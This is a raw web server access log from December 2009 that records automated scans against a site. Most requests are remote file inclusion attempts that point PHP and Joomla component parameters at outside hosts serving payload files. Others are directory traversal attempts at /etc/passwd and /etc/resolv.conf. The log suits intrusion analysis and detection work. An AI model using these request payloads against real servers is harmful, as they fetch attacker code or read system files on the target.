61.47.61.97 - - [16/Dec/2009:01:36:52 -0600] "GET /logs/access_log.1247788800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
61.47.61.97 - - [16/Dec/2009:01:36:52 -0600] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
61.47.61.97 - - [16/Dec/2009:01:36:52 -0600] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
202.157.142.138 - - [16/Dec/2009:01:37:00 -0600] "GET /logs/access_log.1235433600%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.255.32.182 - - [16/Dec/2009:01:37:29 -0600] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:38:01 -0600] "GET //wamp_dir/setup/yesno.phtml?no_url=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:38:01 -0600] "GET /logs//wamp_dir/setup/yesno.phtml?no_url=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:38:01 -0600] "GET /logs/access_log.1244246400//wamp_dir/setup/yesno.phtml?no_url=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:38:01 -0600] "GET /logs/access_log.1249257600//wamp_dir/setup/yesno.phtml?no_url=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:01:39:22 -0600] "GET //skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:01:39:22 -0600] "GET /logs//skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:01:39:22 -0600] "GET /logs/access_log.1237161600//skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:01:39:22 -0600] "GET /logs/access_log.1231804800//skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:01:39:40 -0600] "GET /logs/access_log.1237161600//skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:01:39:40 -0600] "GET /logs/access_log.1231804800//skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:01:39:40 -0600] "GET //skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:01:39:40 -0600] "GET /logs//skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.19.51.194 - - [16/Dec/2009:01:39:55 -0600] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:41:26 -0600] "GET /logs/access_log.1244246400//wamp_dir/setup/yesno.phtml?no_url=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:41:27 -0600] "GET /logs/access_log.1249257600//wamp_dir/setup/yesno.phtml?no_url=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:41:27 -0600] "GET //wamp_dir/setup/yesno.phtml?no_url=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:41:27 -0600] "GET /logs//wamp_dir/setup/yesno.phtml?no_url=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
65.55.106.131 - - [16/Dec/2009:01:42:07 -0600] "GET /logs/access_log.1156982400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.157.142.138 - - [16/Dec/2009:01:43:11 -0600] "GET /logs/access_log.1240272000%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
207.228.240.75 - - [16/Dec/2009:01:44:09 -0600] "GET //tools/send_reminders.php?includedir=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 308 "-""-"
207.228.240.75 - - [16/Dec/2009:01:44:09 -0600] "GET //tools/send_reminders.php?includedir=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 308 "-""-"
217.149.52.9 - - [16/Dec/2009:01:45:02 -0600] "GET /logs/access_log.1257120000=../../../../../../etc/passwd%00 HTTP/1.0" 404 326 "-""-"
74.53.183.210 - - [16/Dec/2009:01:45:09 -0600] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 346 "-""-"
74.53.183.210 - - [16/Dec/2009:01:45:09 -0600] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 341 "-""-"
74.53.183.210 - - [16/Dec/2009:01:45:10 -0600] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 346 "-""-"
74.53.183.210 - - [16/Dec/2009:01:45:10 -0600] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 341 "-""-"
217.149.52.9 - - [16/Dec/2009:01:46:05 -0600] "GET /logs/access_log.1257120000=../../../../../../etc/passwd%00 HTTP/1.0" 404 326 "-""-"
70.38.64.117 - - [16/Dec/2009:01:46:07 -0600] "GET /logs/access_log.1225065600//skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:01:46:10 -0600] "GET /logs/access_log.1225065600//skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:46:21 -0600] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:46:23 -0600] "GET /logs/access_log.1250985600//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:46:23 -0600] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:46:23 -0600] "GET /logs/access_log.1254960000//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
217.149.52.9 - - [16/Dec/2009:01:47:15 -0600] "GET /logs/access_log.1257465600=../../../../../../etc/passwd%00 HTTP/1.0" 404 326 "-""-"
189.30.242.61 - - [16/Dec/2009:01:48:39 -0600] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:48:39 -0600] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:48:39 -0600] "GET /logs/access_log.1250985600//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:48:39 -0600] "GET /logs/access_log.1254960000//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:01:49:46 -0600] "GET /logs//skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:01:49:47 -0600] "GET //skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:01:49:47 -0600] "GET /logs/access_log.1251244800//skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:01:49:49 -0600] "GET /logs/access_log.1251417600//skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.106.231 - - [16/Dec/2009:01:50:07 -0600] "GET /logs/access_log.1217894400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.110.50.121 - - [16/Dec/2009:01:50:16 -0600] "GET /logs//skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:01:50:16 -0600] "GET /logs/access_log.1251244800//skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:01:50:16 -0600] "GET //skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:01:50:21 -0600] "GET /logs/access_log.1251417600//skin/zero_vote/error.php?%20dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.207.123 - - [16/Dec/2009:01:53:10 -0600] "GET /logs/access_log.1135641600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.218.49.112 - - [16/Dec/2009:01:57:13 -0600] "GET //home.php?pagina=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
202.218.49.112 - - [16/Dec/2009:01:57:13 -0600] "GET /logs//home.php?pagina=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
202.218.49.112 - - [16/Dec/2009:01:57:13 -0600] "GET /logs/access_log.1253145600//home.php?pagina=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
202.218.49.112 - - [16/Dec/2009:01:57:13 -0600] "GET /logs/access_log.1255478400//home.php?pagina=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:01:58:54 -0600] "GET /logs/access_log.1256342400//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:01:58:58 -0600] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:01:59:04 -0600] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:01:59:09 -0600] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:01:59:14 -0600] "GET /logs/access_log.1256342400//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:01:59:19 -0600] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:59:20 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:59:20 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:59:20 -0600] "GET /logs/access_log.1237075200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:01:59:25 -0600] "GET /logs/access_log.1236729600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:01:59:30 -0600] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:01:59:31 -0600] "GET /logs/access_log.1256342400//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:01:59:40 -0600] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 48983 "-""Mozilla/5.0"
207.228.240.75 - - [16/Dec/2009:01:59:50 -0600] "GET /logs/smarty_config.php?root_dir=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 305 "-""-"
207.228.240.75 - - [16/Dec/2009:01:59:51 -0600] "GET /smarty_config.php?root_dir=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 300 "-""-"
207.228.240.75 - - [16/Dec/2009:01:59:51 -0600] "GET /logs/access_log.1240272000%20/smarty_config.php?root_dir=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 328 "-""-"
189.30.242.61 - - [16/Dec/2009:02:00:02 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:02:00:02 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:02:00:06 -0600] "GET /logs/access_log.1237075200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:02:00:41 -0600] "GET /logs/access_log.1236729600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.11.117.195 - - [16/Dec/2009:02:00:56 -0600] "GET /bbshop/shop/main.php?_shop_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
66.11.117.195 - - [16/Dec/2009:02:00:56 -0600] "GET /logs/bbshop/shop/main.php?_shop_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.11.117.195 - - [16/Dec/2009:02:00:56 -0600] "GET /logs/access_log.1240272000%20%20/bbshop/shop/main.php?_shop_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:02:01:10 -0600] "GET /logs/access_log.1250553600//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
66.11.117.195 - - [16/Dec/2009:02:01:47 -0600] "GET /logs/access_log.1240272000/bbshop/shop/main.php?_shop_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:02:02:01 -0600] "GET /logs/access_log.1256428800//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:02:02:19 -0600] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.hamkey.com/_geocache/1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:02:02:19 -0600] "GET /skin/zero_vote/ask_password.php?dir=http://www.hamkey.com/_geocache/1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:02:02:19 -0600] "GET /logs/access_log.1248825600/skin/zero_vote/ask_password.php?dir=http://www.hamkey.com/_geocache/1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:02:02:19 -0600] "GET /skin/zero_vote/ask_password.php?dir=http://www.hamkey.com/_geocache/1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:02:02:19 -0600] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.hamkey.com/_geocache/1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:02:02:19 -0600] "GET /logs/access_log.1248825600/skin/zero_vote/ask_password.php?dir=http://www.hamkey.com/_geocache/1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:02:02:22 -0600] "GET /logs/access_log.1256428800//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.55.230.165 - - [16/Dec/2009:02:02:25 -0600] "GET /logs/access_log.1247961600 HTTP/1.1" 304 - "-""Mozilla/4.0"
66.11.117.195 - - [16/Dec/2009:02:02:38 -0600] "GET /logs/access_log.1240012800/bbshop/shop/main.php?_shop_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.11.117.195 - - [16/Dec/2009:02:02:42 -0600] "GET /logs/access_log.1237248000/bbshop/shop/main.php?_shop_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:02:02:52 -0600] "GET /logs/access_log.1250553600//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
66.11.117.195 - - [16/Dec/2009:02:02:54 -0600] "GET /logs/access_log.1237075200/bbshop/shop/main.php?_shop_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.11.117.195 - - [16/Dec/2009:02:03:05 -0600] "GET /logs/access_log.1239753600/bbshop/shop/main.php?_shop_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
174.37.165.86 - - [16/Dec/2009:02:03:53 -0600] "GET /skin/zero_vote/ask_password.php?dir=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
174.37.165.86 - - [16/Dec/2009:02:03:53 -0600] "GET /logs/skin/zero_vote/ask_password.php?dir=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
174.37.165.86 - - [16/Dec/2009:02:03:53 -0600] "GET /logs/access_log.1248825600/skin/zero_vote/ask_password.php?dir=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:02:03:57 -0600] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:02:03:57 -0600] "GET /logs/access_log.1256342400//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:02:04:10 -0600] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 216796 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:02:04:27 -0600] "GET /logs/access_log.1240272000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:02:04:30 -0600] "GET /logs/access_log.1256342400//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:02:04:35 -0600] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
213.136.32.137 - - [16/Dec/2009:02:04:37 -0600] "GET /logs/index.php?arquivo=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 297 "-""-"
213.136.32.137 - - [16/Dec/2009:02:04:39 -0600] "GET /logs/index.php?arquivo=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 297 "-""-"
213.136.32.137 - - [16/Dec/2009:02:04:39 -0600] "GET /index.php?arquivo=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 292 "-""-"
213.136.32.137 - - [16/Dec/2009:02:04:46 -0600] "GET /index.php?arquivo=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 292 "-""-"
200.93.147.154 - - [16/Dec/2009:02:04:53 -0600] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 216796 "-""Mozilla/5.0"
212.158.160.50 - - [16/Dec/2009:02:06:16 -0600] "GET /logs/access_log.1240272000%20//admin/index.php?o=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 327 "-""-"
189.30.242.61 - - [16/Dec/2009:02:10:33 -0600] "GET /logs/access_log.1240272000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.145.174.46 - - [16/Dec/2009:02:11:07 -0600] "GET /logs/access_log.1241222400 HTTP/1.1" 200 798010 "-"".NET Framework/2.0"
74.53.183.210 - - [16/Dec/2009:02:13:11 -0600] "GET /logs/index.php?place=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 297 "-""-"
74.53.183.210 - - [16/Dec/2009:02:13:11 -0600] "GET /logs/index.php?place=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 297 "-""-"
74.53.183.210 - - [16/Dec/2009:02:13:25 -0600] "GET /index.php?place=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 292 "-""-"
74.53.183.210 - - [16/Dec/2009:02:13:25 -0600] "GET /index.php?place=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 292 "-""-"
202.218.49.112 - - [16/Dec/2009:02:15:12 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
202.218.49.112 - - [16/Dec/2009:02:15:12 -0600] "GET /logs/access_log.1251763200//modules/vwar/admin/admin.php?vwar_root=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
202.218.49.112 - - [16/Dec/2009:02:15:12 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
202.218.49.112 - - [16/Dec/2009:02:15:12 -0600] "GET /logs/access_log.1235174400//modules/vwar/admin/admin.php?vwar_root=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.55.207.29 - - [16/Dec/2009:02:16:09 -0600] "GET /logs/access_log.1178236800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.40.103.14 - - [16/Dec/2009:02:19:38 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 318 "-""-"
121.125.67.213 - - [16/Dec/2009:02:19:41 -0600] "GET /logs/access_log.1251504000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:19:41 -0600] "GET /logs/access_log.1251676800//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:19:41 -0600] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:19:41 -0600] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:19:42 -0600] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:19:42 -0600] "GET /logs/access_log.1251504000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
